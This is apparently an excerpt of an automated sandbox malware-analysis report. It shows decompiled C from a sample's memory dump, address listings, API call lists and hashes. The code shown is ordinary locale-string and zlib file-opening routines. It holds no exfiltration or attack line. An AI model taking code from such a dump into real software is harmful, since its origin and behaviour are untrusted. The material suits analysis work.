                                                                                                                                                                                                    								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                                                                                                    									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L52;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t150 = 0xffffffe0;
                                                                                                                                                                                                    							_t179 = _t150 % _t182;
                                                                                                                                                                                                    							if(_t150 / _t182 < 2) {
                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t25 = _t182 + 8; // 0x8
                                                                                                                                                                                                    							_t152 = _t182 + _t25;
                                                                                                                                                                                                    							if(_t182 + _t25 > 0x400) {
                                                                                                                                                                                                    								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                                                                                                                                                    								__eflags = _t153;
                                                                                                                                                                                                    								if(_t153 == 0) {
                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                    									_v16 = _t153;
                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								 *_t153 = 0xdddd;
                                                                                                                                                                                                    								L26:
                                                                                                                                                                                                    								_t153 =  &(_t153[4]);
                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							E0040CFB0(_t152);
                                                                                                                                                                                                    							_t153 = _t189;
                                                                                                                                                                                                    							if(_t153 == 0) {
                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *_t153 = 0xcccc;
                                                                                                                                                                                                    							goto L26;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t178 = _a16;
                                                                                                                                                                                                    				_t157 = _a12;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t178 = _t178 - 1;
                                                                                                                                                                                                    					if( *_t157 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t157 =  &(_t157[1]);
                                                                                                                                                                                                    					if(_t178 != 0) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t178 = _t178 | 0xffffffff;
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t160 = _a16 - _t178 - 1;
                                                                                                                                                                                                    				if(_t160 < _a16) {
                                                                                                                                                                                                    					_t160 = _t160 + 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_a16 = _t160;
                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                    			}











































                                                                                                                                                                                                    0x00417089
                                                                                                                                                                                                    0x00417090
                                                                                                                                                                                                    0x00417098
                                                                                                                                                                                                    0x0041709a
                                                                                                                                                                                                    0x004170a0
                                                                                                                                                                                                    0x004170a6
                                                                                                                                                                                                    0x004170bb
                                                                                                                                                                                                    0x004170c5
                                                                                                                                                                                                    0x004170cb
                                                                                                                                                                                                    0x004170ce
                                                                                                                                                                                                    0x004170d0
                                                                                                                                                                                                    0x004170d0
                                                                                                                                                                                                    0x004170bd
                                                                                                                                                                                                    0x004170bd
                                                                                                                                                                                                    0x004170bd
                                                                                                                                                                                                    0x004170bb
                                                                                                                                                                                                    0x004170dd
                                                                                                                                                                                                    0x00417101
                                                                                                                                                                                                    0x00417101
                                                                                                                                                                                                    0x00417109
                                                                                                                                                                                                    0x004172bb
                                                                                                                                                                                                    0x004172be
                                                                                                                                                                                                    0x004172c1
                                                                                                                                                                                                    0x004172c4
                                                                                                                                                                                                    0x004172cb
                                                                                                                                                                                                    0x004172cb
                                                                                                                                                                                                    0x004172ce
                                                                                                                                                                                                    0x004172d1
                                                                                                                                                                                                    0x004172d8
                                                                                                                                                                                                    0x004172d8
                                                                                                                                                                                                    0x004172de
                                                                                                                                                                                                    0x004172e4
                                                                                                                                                                                                    0x004172e7
                                                                                                                                                                                                    0x004172ea
                                                                                                                                                                                                    0x004172f3
                                                                                                                                                                                                    0x004172f6
                                                                                                                                                                                                    0x004173ef
                                                                                                                                                                                                    0x004173f1
                                                                                                                                                                                                    0x004173f1
                                                                                                                                                                                                    0x004173f4
                                                                                                                                                                                                    0x004173f6
                                                                                                                                                                                                    0x004173f9
                                                                                                                                                                                                    0x004173fe
                                                                                                                                                                                                    0x004173ff
                                                                                                                                                                                                    0x00417402
                                                                                                                                                                                                    0x00417404
                                                                                                                                                                                                    0x00417406
                                                                                                                                                                                                    0x00417409
                                                                                                                                                                                                    0x0041740b
                                                                                                                                                                                                    0x0041740c
                                                                                                                                                                                                    0x00417411
                                                                                                                                                                                                    0x00417409
                                                                                                                                                                                                    0x00417412
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417412
                                                                                                                                                                                                    0x00417309
                                                                                                                                                                                                    0x0041730e
                                                                                                                                                                                                    0x00417311
                                                                                                                                                                                                    0x00417314
                                                                                                                                                                                                    0x00417316
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041732a
                                                                                                                                                                                                    0x0041732c
                                                                                                                                                                                                    0x0041732f
                                                                                                                                                                                                    0x00417331
                                                                                                                                                                                                    0x0041733a
                                                                                                                                                                                                    0x00417379
                                                                                                                                                                                                    0x00417379
                                                                                                                                                                                                    0x00417379
                                                                                                                                                                                                    0x0041737b
                                                                                                                                                                                                    0x0041737b
                                                                                                                                                                                                    0x0041737d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417384
                                                                                                                                                                                                    0x0041739c
                                                                                                                                                                                                    0x0041739e
                                                                                                                                                                                                    0x004173a1
                                                                                                                                                                                                    0x004173a3
                                                                                                                                                                                                    0x004173bf
                                                                                                                                                                                                    0x004173c1
                                                                                                                                                                                                    0x004173c9
                                                                                                                                                                                                    0x004173cb
                                                                                                                                                                                                    0x004173cb
                                                                                                                                                                                                    0x004173a5
                                                                                                                                                                                                    0x004173a5
                                                                                                                                                                                                    0x004173a5
                                                                                                                                                                                                    0x004173cf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004173d4
                                                                                                                                                                                                    0x0041733c
                                                                                                                                                                                                    0x0041733f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417341
                                                                                                                                                                                                    0x00417344
                                                                                                                                                                                                    0x00417349
                                                                                                                                                                                                    0x00417362
                                                                                                                                                                                                    0x00417368
                                                                                                                                                                                                    0x0041736a
                                                                                                                                                                                                    0x0041736c
                                                                                                                                                                                                    0x00417372
                                                                                                                                                                                                    0x00417372
                                                                                                                                                                                                    0x00417372
                                                                                                                                                                                                    0x00417375
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417375
                                                                                                                                                                                                    0x0041734b
                                                                                                                                                                                                    0x00417350
                                                                                                                                                                                                    0x00417352
                                                                                                                                                                                                    0x00417354
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417356
                                                                                                                                                                                                    0x0041735c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041735c
                                                                                                                                                                                                    0x00417333
                                                                                                                                                                                                    0x00417333
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417117
                                                                                                                                                                                                    0x0041711a
                                                                                                                                                                                                    0x004172ec
                                                                                                                                                                                                    0x004172ec
                                                                                                                                                                                                    0x00417414
                                                                                                                                                                                                    0x00417425
                                                                                                                                                                                                    0x00417425
                                                                                                                                                                                                    0x00417120
                                                                                                                                                                                                    0x00417126
                                                                                                                                                                                                    0x0041712d
                                                                                                                                                                                                    0x0041712d
                                                                                                                                                                                                    0x00417130
                                                                                                                                                                                                    0x00417153
                                                                                                                                                                                                    0x00417155
                                                                                                                                                                                                    0x00417157
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041715d
                                                                                                                                                                                                    0x0041715d
                                                                                                                                                                                                    0x004171a2
                                                                                                                                                                                                    0x004171a2
                                                                                                                                                                                                    0x004171a5
                                                                                                                                                                                                    0x004171a8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004171c1
                                                                                                                                                                                                    0x004172aa
                                                                                                                                                                                                    0x004172ad
                                                                                                                                                                                                    0x004172b2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004172b5
                                                                                                                                                                                                    0x004171c7
                                                                                                                                                                                                    0x004171db
                                                                                                                                                                                                    0x004171dd
                                                                                                                                                                                                    0x004171e2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004171ef
                                                                                                                                                                                                    0x0041721a
                                                                                                                                                                                                    0x0041721c
                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                    0x00417263
                                                                                                                                                                                                    0x00417265
                                                                                                                                                                                                    0x00417265
                                                                                                                                                                                                    0x00417267
                                                                                                                                                                                                    0x00417277
                                                                                                                                                                                                    0x0041727d
                                                                                                                                                                                                    0x0041727f
                                                                                                                                                                                                    0x00417281
                                                                                                                                                                                                    0x00417282
                                                                                                                                                                                                    0x00417283
                                                                                                                                                                                                    0x00417286
                                                                                                                                                                                                    0x0041728c
                                                                                                                                                                                                    0x0041728f
                                                                                                                                                                                                    0x00417288
                                                                                                                                                                                                    0x00417288
                                                                                                                                                                                                    0x00417289
                                                                                                                                                                                                    0x00417289
                                                                                                                                                                                                    0x004172a0
                                                                                                                                                                                                    0x004172a0
                                                                                                                                                                                                    0x004172a4
                                                                                                                                                                                                    0x004172a9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417267
                                                                                                                                                                                                    0x00417222
                                                                                                                                                                                                    0x00417223
                                                                                                                                                                                                    0x00417225
                                                                                                                                                                                                    0x00417228
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041722a
                                                                                                                                                                                                    0x0041722a
                                                                                                                                                                                                    0x0041722e
                                                                                                                                                                                                    0x00417233
                                                                                                                                                                                                    0x0041724c
                                                                                                                                                                                                    0x00417252
                                                                                                                                                                                                    0x00417254
                                                                                                                                                                                                    0x00417256
                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                    0x0041725f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041725f
                                                                                                                                                                                                    0x00417235
                                                                                                                                                                                                    0x0041723a
                                                                                                                                                                                                    0x0041723c
                                                                                                                                                                                                    0x0041723e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417240
                                                                                                                                                                                                    0x00417246
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417246
                                                                                                                                                                                                    0x004171f4
                                                                                                                                                                                                    0x00417213
                                                                                                                                                                                                    0x00417213
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004171f4
                                                                                                                                                                                                    0x00417163
                                                                                                                                                                                                    0x00417164
                                                                                                                                                                                                    0x00417169
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041716b
                                                                                                                                                                                                    0x0041716b
                                                                                                                                                                                                    0x00417174
                                                                                                                                                                                                    0x0041718a
                                                                                                                                                                                                    0x00417190
                                                                                                                                                                                                    0x00417192
                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                    0x00417194
                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                    0x00417176
                                                                                                                                                                                                    0x0041717b
                                                                                                                                                                                                    0x0041717f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417181
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00417181
                                                                                                                                                                                                    0x00417157
                                                                                                                                                                                                    0x00417109
                                                                                                                                                                                                    0x004170df
                                                                                                                                                                                                    0x004170e2
                                                                                                                                                                                                    0x004170e5
                                                                                                                                                                                                    0x004170e5
                                                                                                                                                                                                    0x004170e8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004170ea
                                                                                                                                                                                                    0x004170ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004170ef
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004170ef
                                                                                                                                                                                                    0x004170f7
                                                                                                                                                                                                    0x004170fb
                                                                                                                                                                                                    0x004170fd
                                                                                                                                                                                                    0x004170fd
                                                                                                                                                                                                    0x004170fe
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,007718B0), ref: 004170C5
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                    • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                    • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                    • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                    • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                    • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                    • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                    • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                    • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                    • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3809854901-0
                                                                                                                                                                                                    • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                    • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                    			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                    				char* _t60;
                                                                                                                                                                                                    				char _t62;
                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                    				char _t64;
                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                                    				intOrPtr _t69;
                                                                                                                                                                                                    				intOrPtr _t70;
                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                                                    				intOrPtr _t82;
                                                                                                                                                                                                    				intOrPtr* _t83;
                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                    				char* _t88;
                                                                                                                                                                                                    				char* _t89;
                                                                                                                                                                                                    				intOrPtr* _t91;
                                                                                                                                                                                                    				intOrPtr* _t93;
                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                    				signed int _t98;
                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                    				void* _t101;
                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t98 = _t97 | 0xffffffff;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                                                                                                    				_t91 = __eax;
                                                                                                                                                                                                    				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                                                                                                    				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                                                                                                                                                    					_t101 = _t100 + 4;
                                                                                                                                                                                                    					if(_t93 == 0) {
                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                                                                                                    						 *_t93 = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                                                                                                    						 *(_t93 + 0x6c) = _t98;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                                                                                                                                                    						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                                                                                                    						_t102 = _t101 + 0xc;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                                                                                                    						_t87 = _t57 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t82 =  *_t57;
                                                                                                                                                                                                    							_t57 = _t57 + 1;
                                                                                                                                                                                                    						} while (_t82 != 0);
                                                                                                                                                                                                    						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                                                                                                    						_t103 = _t102 + 4;
                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                                                                                                    						if(_t60 == 0) {
                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                    							E00405160(0, _t87, _t93);
                                                                                                                                                                                                    							goto L31;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                                                                                                    							_t88 = _t60;
                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							if( *_t91 == 0x72) {
                                                                                                                                                                                                    								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t63 =  *_t91;
                                                                                                                                                                                                    							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                                                                                                    								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t64 =  *_t91;
                                                                                                                                                                                                    							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                                                                                                    								__eflags = _t64 - 0x66;
                                                                                                                                                                                                    								if(_t64 != 0x66) {
                                                                                                                                                                                                    									__eflags = _t64 - 0x68;
                                                                                                                                                                                                    									if(_t64 != 0x68) {
                                                                                                                                                                                                    										__eflags = _t64 - 0x52;
                                                                                                                                                                                                    										if(_t64 != 0x52) {
                                                                                                                                                                                                    											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                                                                                                    											 *_t89 = _t64;
                                                                                                                                                                                                    											_t87 = _t89 + 1;
                                                                                                                                                                                                    											__eflags = _t87;
                                                                                                                                                                                                    											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t98 = _t64 - 0x30;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                    							if(_t64 == 0) {
                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t87 = _t103 + 0x68;
                                                                                                                                                                                                    							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                    							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                                                                                                    							if(_t65 == 0) {
                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								if(_t65 != 0x77) {
                                                                                                                                                                                                    									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                    									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                                                                                                    									 *_t93 = _t66;
                                                                                                                                                                                                    									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                                                                                                    									_t104 = _t103 + 0x14;
                                                                                                                                                                                                    									__eflags = _t67;
                                                                                                                                                                                                    									if(_t67 != 0) {
                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L34;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_push(0x38);
                                                                                                                                                                                                    									_push("1.2.3");
                                                                                                                                                                                                    									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                                                                                                    									_push(8);
                                                                                                                                                                                                    									_push(0xfffffff1);
                                                                                                                                                                                                    									_push(8);
                                                                                                                                                                                                    									_push(_t98);
                                                                                                                                                                                                    									_push(_t93);
                                                                                                                                                                                                    									_t91 = E00404CE0();
                                                                                                                                                                                                    									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                    									_t104 = _t103 + 0x24;
                                                                                                                                                                                                    									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                                                                                                    									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                                                                                                    									if(_t91 != 0 || _t79 == 0) {
                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                    										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                                                                                                    										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                                                                                                                                                    										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                    										__eflags = _t69;
                                                                                                                                                                                                    										_push(_t104 + 0x18);
                                                                                                                                                                                                    										if(__eflags >= 0) {
                                                                                                                                                                                                    											_push(_t69);
                                                                                                                                                                                                    											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                    											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                                                                                                    											_t70 = E0040CB9D();
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                                                                                                    										__eflags = _t70;
                                                                                                                                                                                                    										if(_t70 == 0) {
                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                                                                                                    											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                                                                                                    												E00405000(_t93, 0);
                                                                                                                                                                                                    												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                                                                                                    												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                                                                                                    												__eflags = _t74;
                                                                                                                                                                                                    												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                                                                                                    												return _t93;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                                                                                                    												return _t93;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L42;
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							_t62 =  *_t83;
                                                                                                                                                                                                    							 *_t88 = _t62;
                                                                                                                                                                                                    							_t83 = _t83 + 1;
                                                                                                                                                                                                    							_t88 = _t88 + 1;
                                                                                                                                                                                                    							if(_t62 != 0) {
                                                                                                                                                                                                    								goto L7;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L42:
                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x004057b7
                                                                                                                                                                                                    0x004057bf
                                                                                                                                                                                                    0x004057c3
                                                                                                                                                                                                    0x004057c5
                                                                                                                                                                                                    0x004057cd
                                                                                                                                                                                                    0x004059c8
                                                                                                                                                                                                    0x004059ce
                                                                                                                                                                                                    0x004057db
